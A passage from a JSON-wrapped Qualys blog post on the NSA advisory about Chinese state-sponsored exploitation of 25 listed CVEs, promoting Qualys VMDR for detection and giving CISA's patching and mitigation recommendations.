[CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for &quot;Active Attack&quot; RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [&quot;NSA&#x27;s Top 25 Vulnerabilities from China&quot; dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}